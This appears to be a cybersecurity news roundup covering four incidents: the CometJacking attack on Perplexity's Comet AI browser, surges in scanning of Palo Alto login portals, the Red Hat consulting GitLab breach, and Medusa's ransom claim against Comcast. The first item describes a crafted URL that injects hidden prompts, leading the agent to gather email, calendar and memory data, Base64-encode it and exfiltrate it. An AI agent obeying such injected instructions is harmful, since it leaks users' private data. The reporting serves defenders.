Intro Snapshot
Today’s threats show how trust models are fracturing—AI agents become insiders, firewall login portals face sweeps, developer infrastructure is compromised, and ransom gangs amplify their reach through bold claims. The battleground is no longer just endpoints—it’s logic, identity, and ecosystems.
1) CometJacking: One click turns Perplexity’s Comet into data exfiltration tool
Full URL: https://thehackernews.com/2025/10/cometjacking-one-click-can-turn.html
Researchers revealed CometJacking, where a specially crafted URL injects hidden prompts into the Comet AI browser. That prompt can command the agent to access memory, connected services (Gmail, Calendar), obfuscate data via Base64, then exfiltrate—all without credential theft.
2) Massive scanning spikes on Palo Alto portal endpoints
Full URL: https://thehackernews.com/2025/10/scanning-activity-on-palo-alto-networks.html
Threat intelligence traces a dramatic surge—~500% increase—in IPs scanning Palo Alto Networks login portals in a short window. The pattern suggests reconnaissance ahead of targeting NGFW/SSL VPN systems.
3) Red Hat confirms GitLab consulting instance breach; data copied
Full URL: https://www.redhat.com/en/blog/security-update-incident-related-red-hat-consulting-gitlab-instance
Red Hat publicly acknowledged unauthorized access to a consulting GitLab instance used by its internal consulting division. Some data was copied. Red Hat asserts it didn’t affect core product infrastructure or its supply chain.
Reports indicate approximately 570 GB across ~28,000 repositories were claimed by the intruders.
4) Medusa group claims exfiltration from Comcast (834 GB demand)
Full URL: https://www.vpnmentor.com/news/hacker-group-medusa-claims-comcast-breach/
Medusa ransomware gang has claimed that it exfiltrated 834.4 GB of data from Comcast and is demanding a $1.2M ransom. However, Comcast has reportedly denied recognizing the files shown in the sample.
Key Takeaways
Agents are new insider threats: CometJacking shows how AI agents, once granted access, can be commandeered via logic injection. Recon isn’t random: The Palo Alto portal scans are likely precursors to targeted firewall/VPN compromise attempts. Consulting and internal repos are treasure troves: The Red Hat GitLab breach emphasizes that even non-customer-facing infrastructure holds critical metadata and architecture details. Ransom claims need validation: Medusa’s bold Comcast claim should be scrutinized; sometimes the files shown are misattributed or belong to others. Access segmentation and token rotation are non-negotiable: After a breach, rotate all tokens, secrets, and service credentials ASAP—especially in connected dev or consulting systems.